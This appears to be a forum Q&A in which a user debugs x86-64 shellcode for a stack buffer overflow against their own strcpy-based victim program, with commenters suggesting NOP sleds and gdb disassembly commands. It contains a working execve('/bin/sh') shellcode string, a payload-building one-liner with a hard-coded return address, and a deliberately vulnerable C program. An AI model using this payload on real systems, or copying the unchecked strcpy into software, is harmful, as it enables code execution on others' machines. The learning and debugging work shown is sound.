# Buffer overflow attack with shell code

Tags: assembly, x86, gdb, buffer-overflow, shellcode

I used this shell code for buffer overflow attack

```
$(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\xff\x7f"')
```

(python -c is as same as perl -e)

My intention was this assembly code

```
__asm__ __volatile__
(
  "xor %rdi,%rdi \n\t"
  "push %rdi \n\t"
  "push %rdi \n\t"
  "pop %rsi \n\t"
  "pop %rdx \n\t"
  "movq $0x68732f6e69622f2f,%rdi \n\t"
  "push %rdi \n\t"
  "push %rsp \n\t"       
  "pop %rdi \n\t" 
  "push $0x3b \n\t"
  "pop %rax \n\t"          
  "syscall \n\t"
 );
```

But when I give shell code to victim program as argument, it decodes shell code as like this.

```
   0x7fffffffe490:  add    %dh,(%rcx)
   0x7fffffffe492:  callq  *0x57(%rdi)
   0x7fffffffe495:  pop    %rsi
   0x7fffffffe496:  pop    %rdx
   0x7fffffffe497:  movabs $0x5768732f6e69622f,%rdi
   0x7fffffffe4a1:  push   %rsp
   0x7fffffffe4a2:  pop    %rdi
   0x7fffffffe4a3:  pushq  $0x3b
   0x7fffffffe4a5:  pop    %rax
   0x7fffffffe4a6:  syscall 
   0x7fffffffe4a8:  retq
```

Why this change occurs?

```
      4004d6:   55                      push   %rbp
      4004d7:   48 89 e5                mov    %rsp,%rbp
      4004da:   48 31 ff                xor    %rdi,%rdi
      4004dd:   57                      push   %rdi
      4004de:   57                      push   %rdi
      4004df:   5e                      pop    %rsi
      4004e0:   5a                      pop    %rdx
      4004e1:   48 bf 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rdi
      4004e8:   2f 73 68 
      4004eb:   57                      push   %rdi
      4004ec:   54                      push   %rsp
      4004ed:   5f                      pop    %rdi
      4004ee:   6a 3b                   pushq  $0x3b
      4004f0:   58                      pop    %rax
      4004f1:   0f 05                   syscall 
      4004f3:   90                      nop
      4004f4:   5d                      pop    %rbp
      4004f5:   c3                      retq
```

I hope my shell code will decode like above but it decodes like strange.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[36];
    strcpy(buffer, argv[1]);
    return 1;
}
```

Above is victim program source code.

And I use ubuntu 16.04 x64 architecture

Comment: Can you include the hexdump of the machine code in the disassembly?  (Like `objdump -d` format).  My first guess is that decoding from the middle of one of the instructions you wanted to run results in different instructions.  Decoding gets back in sync with what you intended pretty soon.  Try using a NOP sled so the target address doesn't have to be precisely correct.  (i.e. put a bunch of NOPs ahead of the code you want to run.  A jump that lands anywhere in them will work.)

Comment: After adding Nop sleds, this problem doesn't fixed ... And I can't understand what you meaning. Just machine code for shell code in disassembly or all machine code which includes victim program in disassembly?

Comment: Disassemble something with `objdump -d`, or look at [this example](http://codegolf.stackexchange.com/questions/77270/greatest-common-divisor/77364#77364).  Notice how it has a column showing the machine code in hex on the left, as well as the disassembly on the right?  That's useful, and you should include that so it's easier to see how the instruction bytes for `callq  *0x57(%rdi)` might include the instruction bytes for `push %rdi`

Comment: Note that you can just use the `printf` command line utility directly instead of making a detour through Python.

Comment: Your edit confirms that the `0x57` displacement in the indirect CALL (`0xFF`) lines up with `57  push   %rdi`.  I had to look up [CALL](http://www.felixcloutier.com/x86/CALL.html) to confirm that it was 0xFF, though, because you still didn't include machine code hex dumps for what you say it actually decoded as.

Comment: Can you explain how can i get machine code hex dumps with gdb or objdump which needs arguments.

Comment: In gdb: `disas /r` to include raw hexdump.  Run `help disas` for info on specifying a start/end address.  (e.g. you could disassemble from the middle of an instruction to see what would happen if that byte was treated as the first insn).  The output looks kind of messy, so you should manually indent the insn mnemonic column yourself when replacing that code block in your question.